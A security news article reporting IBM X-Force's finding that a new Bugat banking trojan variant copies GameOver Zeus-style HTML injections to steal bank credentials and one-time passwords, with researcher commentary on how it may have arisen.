The GameOver Zeus botnet, disrupted only two months ago by an international joint operation, continues to echo throughout the cybercrime landscape. For instance, IBM X-Force’s advanced malware researchers have detected a new variant of the Bugat malware that uses almost identical (and somewhat upgraded) GameOver HTML injections, which is starting to spread throughout the United Kingdom and the Middle East.
Bugat (variously known as Feodo, Geodo and Cridex) has a fundamental infrastructure that remains the same—it doesn’t use the P2P infrastructure approach that GameOver Zeus was famous for. That was an architecture that made it difficult to track down and disrupt. But the HTML injections and scripts as well as the structure of the attack used by Bugat to target banking applications are what IBM calls “GOZ-like”—and therefore very dangerous.
The new Bugat malware attack on banking applications includes multiple GOZ-based elements for stealing credentials, overcoming two-factor authentication, dealing with IP reputation, and other counter-security measures.
Etay Maor, senior fraud prevention strategist at IBM Security, noted in a blog that in some of the attacks, infected users never reach the real bank login page. Instead, they are directed to a malicious site and are requested to provide their login information.
“In real time, the criminal captures the credentials and connects to the bank via the victim’s IP address,” he said. “This is achieved by Bugat’s back-connect capability, which helps the attacker defeat IP reputation security checks.”
He also explained the multi-step information extraction approach used by the perpetrators. “In case the bank requests more information from the criminal during the transaction process, the criminal can obtain these data elements by using social engineering and [GOZ-like] HTML injection,” he said. “These requests are presented to victims in real time. Such requests can include secret questions and two-factor authentication such as one-time passwords.”
IBM X-Force research teams have seen a dramatic drop in the number of GameOver-infected devices and number of successful fraud attempts since the botnet takedown. However, with this new variant of Bugat malware, the same successful approach seems to be coming back to life by a competing Trojan.
“There are two possible explanations for this,” said Maor. “First, someone from the GOZ group could have moved to the Bugat team. This would not be the first time something like this has happened, which we’ve witnessed in other cases involving Zeus and Citadel; however, it is not very likely in this case since Bugat and GOZ are essentially competitors, while Zeus and Citadel are closely related.”
He added, “The second and more likely explanation is that the Bugat team could have analyzed and perhaps reversed the GOZ malware before copying the HTML injections that made GOZ so highly profitable for its operators.”
This is not the first time that the Bugat team copied or reused other proven attack methods, “so IBM researchers will continue to monitor and analyze new malware variants for both original and borrowed fraud techniques,” Maor said.